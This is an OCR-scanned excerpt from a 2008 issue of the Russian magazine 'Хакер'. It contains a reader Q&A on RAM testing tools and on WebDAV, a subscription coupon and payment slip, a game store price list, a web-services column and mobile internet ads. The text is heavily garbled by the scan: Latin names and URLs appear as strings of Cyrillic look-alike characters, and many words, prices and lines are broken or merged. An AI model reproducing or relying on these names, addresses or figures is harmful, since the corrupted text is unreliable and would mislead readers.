недавно прикупил. Как бы его проверить? 

А: Во-первых, тебе нужна Метіезівб — бес- 
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Специальное предложение: 



платная программа от Криса Брэди (СЬгіз Вгасіу), которая диагностирует 
проблемы памяти. Утилита очень кропотливо (и жутко долго) будет 
сканировать твою память и, в конце концов, выдаст подробный отчет. 
Есть и похожая программа от МіегозоК под названием ѴѴіпсіоѵѵз Метогу 
Біадпозбе. 

Обе рекомендуется запускать со съемного носителя. Неплохо также 
«прогнать тесты» 5&М ( ЬНрѴЛезІітегп.пгп.ги/зпт.Ьіт ) — специальной 
утилиты для тестирования компонентов компьютера под максималь- 
ной нагрузкой. Изначально она была разработана для тестирования и 
поиска ошибок в работе процессора и оперативной памяти, проверки 
стабильности работы элементов питания материнской платы и эффек- 
тивности системы охлаждения. Но позже в ней появилась проверка 
блока питания под сильной нагрузкой на основные компоненты системы 
(в том числе, видеокарты), а в последней версии добавился еще и тест 
жестких дисков. 



ТРПРіЬПІІ ИНТЕРНЕТ 

I ЕкЛІіЧ'иП ПОДКЛЮЧЕНИЕ ЬЕСГ.рдП'О 

* Подкпючвнио - а любом место 
Москвы м Мое* опекой обл. 

■ Срок подключений а Мпскйй » 14 дней, 
в Московской ойл, - от до За ди*Л- 

* УегНийокй прямого іла с ко іі с ко Г О ГОЛОфОННОГО НОморй 



0: Что такое ѴѴеЬОАѴ и для чего он нужен? 

А: ѴѴеЬ-ЬазесІ БізІгіЬіЛесІ АиіЬогіпд апб Ѵегзіопіпд или ѴѴеЬБАѴ — это на- 
бор расширений для традиционного Нурегіехі Тгапзіюг Ргоіюсоі (НТТР), 
позволяющий пользователям совместно работать и манипулировать 
файлами на удаленных ѴѴѴѴѴѴ серверах. По сути, это реальная и намного 
более функциональная альтернатива для уже порядком устаревших 
РТР и 5МВ. Вотлишь некоторые возможности, которые предоставляет 
протокол: 

• выполнение основных файловых операций над объектами на удален- 
ном сервере; 

• выполнение расширенных файловых операций (блокировки, под- 
держка версий); 

• работа с любым типом объектов (не только файлы); 

• поддержка метаданных (свойств) объектов; 

• поддержка одновременной работы над объектами. 

К счастью, даже в самой винде клиент для работы с ѴѴеЬБАѴ встроен по 
умолчанию. Для подключения каталога публикации ѴѴеЬБАѴ в опера- 
ционной системе ѴѴіпсіоѵѵз 2000 (и старше) надо выполнить следующие 
действия: перейти в «Сетевое окружение -> Новое место в сетевом 
окружении ввести 1)РІ_-адрес и имя каталога ѴѴеЬБАѴ». 

Готово. Если своего сервера с поддержкой ѴѴеЬБАѴутебя нет, 
то возможности клиента можно проверить, воспользовавшись 
услугами сайта ЬЦрѴЛезГѵѵеЬсіаѵ.ога/ . С другой стороны, можно 
сразу поднять поддержку этого протокола на своем Ьир-демоне, устано- 
вив для АрасЬе специальный модуль — тосІ_сІаѵ. Кстати сказать, он 
уже пять лет входит в десятку самых популярных модулей сервера 
АрасЬе, хотя в России почему-то технологию по-прежнему используют 
немногие. ПЗС 



* Многоканальные телефонные 
- I Р - те леф амия 
■ ВілДОЛннныц Линии Интернат 
* Ко р по р л т и и 'И.і с частные сети 

■ Кастинг, услуги Оліа-цснтрл 
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ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

Л ОО О ІІЖ/Д (на 1 5% дешевле чем 
I 7ѵѴ и У Ив при покупке в розницу) 




Единая цена по всей России. Доставка за счет издателя, в том числе курьером 
по Москве в пределах МКАД 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 




При подписке на комплект журналов 

ЖЕЛЕЗО 0Ѵ0 + ХАКЕР йѴО + ІТСПЕЦСй: 

- Один номер всего за 147 рублей 
(на 25% дешевле, чем в розницу) 



ЗА 12 МЕСЯЦЕВ 



ЗА 6 МЕСЯЦЕВ 








ВЫГОДА • ГАРАНТИЯ • СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ ВНИМАНИЕ! 



1 . Разборчиво заполните подписной купон и квитанцию, выре- 
зав их из журнала, сделав ксерокопию или распечатав с 
сайта шѵѵ.дІс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купо- 
на и квитанции —любым из нижеперечисленных способов: 

• по электронной почте зиЬ5СгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 



Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных доку- 
ментов в редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подпис 
ных документов по почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в 
последнем случае предварительно отсканировав или сфотогра- 
фировав документы. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы произ- 
водите оплату в ноябре, то журнал будете получать с января. 






Подписка на журнал «ХАКЕР+йѴР» на 6 месяцев стоит 1080 руб. Подарочные журналы при этом не высылаются 



По всем вопоосам 



связанным с подпиской, звоните по бесплатным телефюнам 8(495)780-88-29 (для москвичей) 
и 8(800)200-3-999 (для жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). Вопросы 
о подписке можно также направлять по адресу іпІо@дІс.ги или прояснить на сайте шш.СІ-С.ги 

ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ «ХАКЕР» 



ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
НА ЖУРНАЛ « 



□ на 6 месяцев 

□ на 1 2 месяцев 



начиная с 



. 2008г. 



□ 



Доставлять журнал по почте 
на домашний адрес 
Доставлять журнал курьером : 

I I на адрес офиса* 

I I на домашний адрес** 



(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 



область/край 



город 



улица 



дом 



корпус 



квартира/офис 



телефон ( 



е-таіі 



сумма оплаты 



в свободном поле укажи название фирмы 
и другую необходимую информацию 

в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 



свободное поле 



І_ 



Извещение 



Кассир 



Квитанция 



Кассир 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с N5 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2008 г. 





Ф.И.О. 



Подпись плательщика 



ИНН 



7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 



р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2008 г. 





Ф.И.О. 



Подпись плательщика 









Требуются курьеры! Достойные условия. 
Классный молодой коллектив. 

Звоните: +7 ( 495 ) 780 88 25 
или пишите: $аІе$@датеро$і.ги 






N1(11611010 ѴѴіі 

9984 р. 



Покупку можно оплатить 
электронными деньгами 



РІауЗШІоп 2 ЗІІт 

5200 р. 



РІауЗІаІіоп 3 (406Ь) 



Возможность доставки 
в день заказа 



ХЬох 360 ЕІіІе (ігоев) 

17680 р. 



Р8Р ЗІіт & Ыіе 



15990 р. 7280 р. 



Специальная цена на прис- 
тавки при покупке 3-х игр 



Вигпоиі Рагасіізе 

2080 р. 



Рагк Меззіаіі оі МідМ СопОетпеО 2 
апсі Мадіс - Еіетепіз 
2132 р. 1950 р. 



мінііятів 



Віаскзііе: Агеа 51 Вгап Т игізто 5 Ніітап Тгііоду 

(РАЬ) Ргоіодие (РАЬ) 

2132 р. 1300 р. 1560 р. 



ЭеѵіІ Мау Сгу 4 
2470 р. 






бой оі ѴѴаг: 
СТіаіпз оі 
ОІутриз 
1248 р. 



РіпаІ РапТазу ТасТісз: 

Тке ѴѴаг оі Тке Ьіопз (РАЬ) 
1560 р. 



Ріге ЕтЫет: 
Вакіапі Оам/п 
1924 р. 



Ѵікіпд: ВаШе Тог 
Аздагсі 
1950 р. 



Агту о( Т»о 
(РАЬ) 

2210 р. 



ЕззепЬіаІз Соііесііоп СотрІеТе СоІІейіопз 
1820 р. 1560 р. 



Везісіепі ЕѵіІ: ТІіе 
ЫтЬгеІІа СЬігопісІез 

1820 р. 



СаІІ оі Оиіу 4: 
Мокегп ѴѴагТаге 
1482 р. 
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ОБНЫЕ ВЕБСЕРВИСЫ 



ВТОРОГО ПОКОЛЕНИЯ 



В этой мини-рубрике мы пишем об интересных и полезных ѵѵеЬ-сервисах, 
которые реально могут помочь тебе упростить и улучшить свою 
сетевую жизнь. 



І 



■ійввіи* 



ДОВЕРЬ СВОИ ФОТКИ 

еооеьЕ’У 



РІСА5АѴѴЕВ.Ѳ00еі_Е.С0М 



Фотографии небезопасно хранить на жестком диске, потому что он может по-| 
сыпаться. ОѴО-дискитоже недолговечны: любая царапина может привести! 
к потере дорогих фоток. Да и как потом найти то, что нужно? Нет! Я давно для! 
себя решил, что фотоальбом нужно ввести в Интернете, на надежном сер- 
вере. А где может быть надежнее, чем у боодіе? Специальный сервис Рісаза I 
ѴѴеЬ АІЬигпв предоставляет 1 Гб пространства на каждый аккаунт, позволяя I 
размещать фотки высокого разрешения и удобно разбивать их по альбомам. 
А вспомогательная программа Рісаза поможетлегко исправить огрехи на| 
изображениях и залить их на сервер. 




Й ^С00І_ВІПТ0І\І 



ѵѵѵѵ.мѵсооі_віятоы.сом 



ІДля одного из наших проектов срочно потребовалось нарисовать кнопочки 
в стиле 2.0: красивые, модные, со стильными переливами. Но посколькуу I 
редакторов с художественными навыками, мягко говоря, туговато, а дело I 
горело - пришлось искать альтернативный путь. Быстро выяснилось, что для 
этого потребуется только браузер и этот замечательный сервис. С помощью| 
самой обычной страницы мы выбрали один из трех доступных стилей, указа-| 
пи, размер, цвета, ввелитекст- и, ву-а-ля, получили готовые кнопочки.! 
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лХилтй РоиетЗиррІѵ С*киІ*і*і Ш*ѵ2.5 



ѴѴѴѴ.ІМ-НІ5Т0ВѴ.С0М 



ВСЕЛОГИ ВОДНОМ МЕСТЕ 

и 

Я вынужден общаться то по Зкуре’у.то по ^ЬЬег’у.то по обычной аське и мне 
приходится изрядно покопаться, чтобы найти нужный лог разговора. А если 
вдругон окажется на компьютере, которого нетпод рукой, то вообще пиши 
пропало. В общем, появление нового сервиса, который централизованно 
хранит логи из самых разных клиентов для меня оказалось очень кстати. Для 
работы Іт-Ызіюгу, правда, пришлосьустановить специальное приложение, 
нозатолюбыелоги, практически из любого мессенжера и любого компьюте- 
ра у меня теперь всегда под рукой ! 



ОШІЧЕ-РАСЧЕТ 
МОЩНОСТИ БП 

И 



I I 



ѴѴѴѴѴѴ.ЕХТРЕМЕ.ОІЯЕРѴІ5ІІЖ 
С0М/Р5иСАІ-СІЛ-АТ0Р35Р 



Закачивать музыку из интернета, рыская по всевозможным порталам с кучей 
рекламы, — дело неблагодарное. Забудь про это, и попробуй онлайн-радио 
по заявкам! Укажи свои музыкальные предпочтения, вбив имена любимых 
исполнителей. На основании этих данных будет построен твой индивиду-| 
альный плейлист. Сервису Базііт, наиболее известному подобному ресурсу, 
удалось достичь соглашения какс крупными лейблами (ЕМІ, Зопу ВМС, Ц 
ІІпіѵегзаІ, ѴѴагпег), так и независимыми исполнителями. Поэтому использо- 
вать его ты можешь не просто бесплатно, а абсолютно бесплатно :). 



► ібо 



ХАКЕР 05 /113/ 08 





осікктз 

огіділаіз 

сЬаІІогтде 



Только продета оь! 

ФутЙоттки аа-сгаб с твоим уникальным дизайном в магазинах аиййав огідйіаК* 
Специальный показ тоонх футболок но закрытой вечеринке с участием многочисленных поезд. 
Гы сам п Германия ип пастор- классе лучших дизайнеров асііоа? 

Прояви оригинальность, участвуй а айігёаь егідіпзіь еігаіівпдв! 

ѵуѵчѵѵ.айі[іД50гідіпаі5с1іаиепде г ги 



СЕІ.ЕВРАТЕ 0Ш6ІЫАШГ 




МегаФон-Модем 




За пределами офиса и вне стен квартиры теперь есть мобильный Интернет! 
«МегаФон-Модем» - это миниатюрное ІІ5В-устройство, 5ІМ-карта и специальный тариф, 
созданные для тех, кому Интернет нужен всегда и везде. 

Стоимость комплекта - от 2500 рублей с НДС. В предложение также включен 
Интернет-трафик на пол года (не менее 50 мегабайт трафика каждый месяц). 






Мегафон 




7 ) 8 - 800 - 3330500 * 

>..✓ * Звонки по России бесплатные. 



Интер нет там, где ты! 

Лицензия №№ 10010, 13282, 14404, 15002, 15409, 15410, 

15411, 15412, 16338, 20377 Министерства РФ по связи 
и информатизации. Реклама. Подробности - в точках продаж 
и на сайте ѵѵѵѵѵѵ.тедаіоп.ги. 




Мегафон 

Будущее зависит от тебя 
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